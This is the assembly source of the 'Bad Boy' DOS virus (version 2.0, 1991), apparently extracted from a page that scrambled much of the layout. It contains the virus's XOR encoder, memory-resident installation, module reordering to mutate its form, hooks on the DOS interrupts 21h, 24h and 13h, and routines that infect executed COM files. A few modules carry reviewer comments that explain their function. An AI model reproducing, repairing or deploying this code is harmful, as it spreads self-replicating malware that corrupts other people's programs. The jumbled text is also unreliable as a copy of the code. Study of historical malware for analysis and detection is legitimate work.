Bad Boy 20

code

start:

curofs files fsize ftime fdate stdint21 oldint13 oldint21 oldint24

segment assume cs:code,ds:code .radix 16 org 100 push push pop jmp

word ptr cs:[table+2] cs ds word ptr cs:[table]

db dw dw dw

dw 0 2 ? ? dd dd dd dd

;go to module 1

? ;number of infected files from this copy ;size of infected file ? ? ? ?

;------------- table with module parameters -------------------table: dw offset false_mod_1 ;00 dw offset mod_2 ;02 dw offset mod_3 ;04 dw offset mod_4 ;06 ;offset modules dw offset mod_5 ;08 dw offset mod_6 ;0a dw offset mod_7 ;0c dw offset mod_8 ;0e dw dw dw dw dw dw dw dw

offset offset offset offset offset offset offset offset

mod_2 mod_3 mod_4 mod_5 mod_6 mod_7 mod_8 myend

-

offset offset offset offset offset offset offset offset

mod_1;10 mod_2;12 mod_3;14 mod_4;16 mod_5;18 ;size modules mod_6;1a mod_7;1c mod_8;1e

;------------- module - 1 - coder/decoder ---------------------mod_1: mov bx,offset table+2 ;first module to working (module 2) mov cx,6 ;number of modules to working mod_1_lp1: cmp bx,offset table+0a jne mod_1_cont add bx,2 mod_1_cont: push bx push cx mov ax,[bx] ;ax - offset module mov cx,[bx+10] ;cx - size of module mov bx,ax mod_1_lp2: xor byte ptr [bx],al inc bx

loop pop pop add loop ret

mod_1_lp2 cx bx bx,2 mod_1_lp1

;------------- module - 2 - mutation to memory ----------------mod_2: ;instalation check mov mov mov mov repe jne jmp mod_2_install:

mod_2_cont:

es,cs:[2] di,100 si,100 cx,0bh cmpsb mod_2_install word ptr cs:[table+06]

;memory size

;jump if not install ;if install, jump to module 4

;instalation

mov dec mov

ax,cs ax ds,ax

cmp je

byte ptr ds:[0],'z' mod_2_cont

jmp

word ptr cs:[table+6]

sub mov sub mov mov push pop

word ptr ds:[3],0c0 ax,es ax,0c0 es,ax word ptr ds:[12],ax cs ds

;if no last mcb - go to mod4

;decrement memory size with 2k

mod_2_mut:

mod_2_lp1:

mov

byte ptr cs:files,0

mov mov mov rep

di,100 cx,offset mod_1-100 si,100 movsb ;write table to new memory

mov add xor

bx,word ptr cs:[table] bx,offset mod_1_lp2-offset mod_1+1 byte ptr [bx],18 ;change code method

mov mov

cx,8 word ptr curofs,offset mod_1

push cx call mod_2_rnd ;generate random module addres push bx ;addres in table returned from mod_2_rnd

mov push add mov pop pop xchg mov rep xchg mov or pop loop mov not mov mod_2_lp2:

ax,[bx] ;offset module ax bx,10 cx,[bx] ;length of module si bx di,curofs word ptr es:[bx],di ;change module offset in table movsb ;copy module to new memory di,curofs ;change current offset in new memory ax,8000 word ptr [bx],ax ;mark module - used cx mod_2_lp1 cl,8 ax bx,offset table

and word ptr [bx],ax add bx,2 loop mod_2_lp2

;unmark all modules

jmp

word ptr cs:[table+4]

push push xor mov

cx es cx,cx es,cx

;go to module 3

mod_2_rnd:

mod_2_lp3:

mov bx,es:[46c] db 81,0e3,07,00 ;and bx,7 shl bx,1 add bx,offset table test [bx],8000 jnz mod_2_lp3 pop es pop cx ret

;------------- module - 3 - set interrupt vectors --------------mod_3: xor ax,ax mov ds,ax mov mov mov mov

ax,ds:[4*21] word ptr es:[oldint21],ax ax,ds:[4*21+2] word ptr es:[oldint21+2],ax

mov int cmp jne

ah,30 21 ax,1e03 mod_3_getvec

mov mov push

word ptr es:[stdint21],1460 ax,1203 ds

int mov pop jmp

2f word ptr es:[stdint21+2],ds ds mod_3_setvec

mod_3_getvec: mov mov mov mov

ax,ds:[4*21] word ptr es:[stdint21],ax ax,ds:[4*21+2] word ptr es:[stdint21+2],ax

mod_3_setvec: cli mov mov mov mov sti

ax,word ptr es:[table+0c] ds:[4*21],ax ax,es ds:[4*21+2],ax

mov mov int push mov mov mov pop int

cx,es ah,13 ; 2f ; es ; es,cx ; word ptr es:[oldint13],dx ; get standart int13 addres word ptr es:[oldint13+2],ds ; es ; 2f ;

jmp

word ptr cs:[table+06]

;go to module 4

;------------- module - 4 - restore old program code & start ---mod_4: push cs push cs pop ds pop es mov si,word ptr cs:[table+06] add si,offset mod_4_cont - offset mod_4 mov di,cs:fsize add di,offset myend+1 push di mov cx,offset mod_5 - offset mod_4_cont cld rep movsb ret mod_4_cont: mov si,cs:fsize add si,100

mod_4_cnt:

cmp jnc mov

si,offset myend+1 mod_4_cnt si,offset myend+1

mov mov rep mov

di,100 cx,offset myend-100 movsb ax,100 ;

push ret

ax

; jmp 100 ;

;------------- module - 5 - special program --------------------
; mod_5: writes the two words stored at oldint21 back into the INT 21h
; slot of the interrupt vector table, i.e. it removes this program's
; INT 21h hook. `.radix 16` is in effect for the listing, so 4*21 is
; 0084h, the IVT entry for interrupt 21h (offset word, then segment word).
; In:    cs:[oldint21], cs:[oldint21+2] = saved handler address
; Out:   0000:0084..0087 rewritten
; Clobb: di, flags; ds is left at 0 (not restored before ret)
; NOTE(review): the only visible reference is `call word ptr cs:[table+8]`
; in module 8, next to a compare of cs:files with 0a. That part of the
; listing is column-scrambled, so treat the trigger as unconfirmed.
mod_5:
        xor     di,di
        mov     ds,di                   ; ds = 0 -> segment of the IVT
        cli                             ; keep interrupts off while the vector is half-written
        mov     di,word ptr cs:[oldint21]
        mov     ds:[4*21],di            ; offset word of the saved handler
        mov     di,word ptr cs:[oldint21+2]
        mov     ds:[4*21+2],di          ; segment word of the saved handler
        sti
        ret
        db      'make me better!'       ; literal text stored inside module 5
;------------- module - 6 - int 24 header ----------------------
; mod_6: replacement INT 24h (DOS critical-error) handler. It only sets
; AL=3 and returns; in the DOS critical-error convention AL=3 means
; "fail the call", so no Abort/Retry/Fail prompt reaches the user while
; this handler is installed.
; NOTE(review): module 1's loop appears to step over table+0a (this
; module's table entry), so the text below is presumably left unencoded
; and usable as a static signature. Verify against a sample; the
; relevant lines are column-scrambled on this page.
mod_6:
        mov     al,3                    ; AL=3 = fail the failing DOS call
        iret
        db      'the bad boy virus, version 2.0, copyright (c) 1991.',0
;------------- module - 7 - int 21 header ----------------------
; NOTE(review): after the five pushes, the extraction has separated the
; mnemonics from their operands (the operands appear further down the
; page). The remainder is kept exactly as extracted and is not annotated.
mod_7:
        push    bx
        push    si
        push    di
        push    es
        push    ax
cmp je jmp mod_7_begin: push push pop xor mov mov mov movsw movsw mov cli mov mov mov sti pop

ax,4b00 mod_7_begin mod_7_exit

mov pushf call jc mov mod_7_infect:

ax,3d00

ds cs es ax,ax ds,ax si,4*24 di,offset oldint24

; ;

; ; ax,word ptr cs:[table+0a] ; ds:[4*24],ax ax,cs ds:[4*24+2],ax

; ; ; ; change int24 vector ; ; ; ;

ds

cs:oldint21 mod_7_ex bx,ax

; ;

; ; open,infect,close file ; ;

mod_7_ex:

call pushf mov pushf call popf jc

word ptr cs:[table+0e]

;

push cli xor mov mov xchg mov mov xchg mov sti pop

ds

push xor mov mov mov mov mov pop

ds ; ax,ax ds,ax ax,word ptr cs:oldint24 ds:[4*24],ax ax,word ptr cs:oldint24+2 ds:[4*24+2],ax ds ;

pop pop pop pop pop

ax es di si bx

jmp

cs:oldint21

ah,3e

; ;

cs:oldint21

;

mod_7_ex ; ;

ax,ax ; ds,ax ; ax,word ptr cs:[oldint13] ; ax,word ptr ds:[4*13] ; word ptr cs:[oldint13],ax ; exchange int13 vectors ax,word ptr cs:[oldint13+2] ; ax,word ptr ds:[4*13+2] ; word ptr cs:[oldint13+2],ax ; ; ds ; ; ; ;

; ; restore int24 vector

;

mod_7_exit:

;------------- module - 8 - infecting (bx - file handle) -------mod_8: push cx push dx push ds push es push di push bp push mov int mov xor mov int pop

bx ax,1220 2f bl,es:[di] bh,bh ax,1216 2f bx

mov

ax,word ptr es:[di+11]

cmp jc jmp

ax,0f000 mod_8_c mod_8_exit

mov

word ptr es:[di+2],2

mov mov

ax,es:[di+11] cs:fsize,ax

mov mov mov mov

ax,word ptr es:[di+0dh] word ptr cs:[ftime],ax ax,word ptr es:[di+0f] word ptr cs:[fdate],ax

push pop mov mov mov pushf call jnc jmp

cs ; ds ; dx,offset myend+1 cx,offset myend-100 ah,3f

mod_8_c:

mod_8_cnt:

mov mov mov cmp jne jmp mod_8_nxtchk: xchg cmp jne jmp

;open mode - r/w ; save file size ; ; save file date/time ; ;

; ; read first bytes ;

cs:oldint21 mod_8_cnt mod_8_exit bp,ax si,dx ax,'mz' ax,word ptr ds:[si] mod_8_nxtchk mod_8_exit

; ax - bytes read

ah,al ax,ds:[si] mod_8_cnt2 mod_8_exit

mod_8_cnt2:

mod_8_cnt1:

push push push pop mov mov mov repe pop pop jne jmp

es di cs es si,100 di,dx cx,0bh cmpsb di es mod_8_cnt1 mod_8_exit

mov

word ptr es:[di+15],0

push push mov add

es di si,word ptr cs:[table+0e] si,offset mod_8_cont - offset mod_8

; ; ; ; check for infected file ; ; ; ; fp:=0

xor push pop mov cld rep pop pop

di,di cs es cx,offset mod_8_cont_end - offset mod_8_cont

mov add push xor push

si,word ptr cs:[table+0e] si,offset mod_8_cont_end - offset mod_8 si si,si si

push cli xor mov mov xchg mov mov xchg mov sti pop

ds

movsb di es

; ;

ax,ax ; ds,ax ; ax,word ptr cs:[oldint13] ; ax,word ptr ds:[4*13] ; word ptr cs:[oldint13],ax ; ax,word ptr cs:[oldint13+2] ; exchange int13 vectors ax,word ptr ds:[4*13+2] ; word ptr cs:[oldint13+2],ax ; ; ds ;

ret mod_8_cont: push call pop

bx word ptr cs:[table] bx

mov mov mov pushf call

dx,100 ah,40 cx,offset myend-0ff ; cs:stdint21

pushf push call pop popf jnc pop mov add push ret mod_8_cont1: mov mov mov mov

bx word ptr cs:[table] bx

; code virus ; ; write code in begin ;

; decode virus

mod_8_cont1 ax ax,word ptr cs:[table+0e] ax,offset mod_8_ext - offset mod_8 ax ax,es:[di+11] ; fp:=end of file word ptr es:[di+15],ax ; dx,offset myend+1 cx,bp

; bp - files read

mov pushf call

ah,40

; ;

cs:stdint21

; write in end of file

ret mod_8_cont_end: mov mov mov pushf call

mod_8_exit: mod_8_ext: mod_8_ex:

ax,5701 cx,cs:ftime dx,cs:fdate ; cs:oldint21

; ; ; restore file date/time ;

inc cmp jne call jmp

cs:files cs:files,0a mod_8_ext word ptr cs:[table+8] short mod_8_ext

stc jmp

short mod_8_ex

clc pop pop pop pop pop pop ret

bp di es ds dx cx

;--------------------------------------------------------------myend

db int

false_mod_1: mov ret code

0 20

;code of infected file

word ptr cs:[table],offset mod_1

ends end start
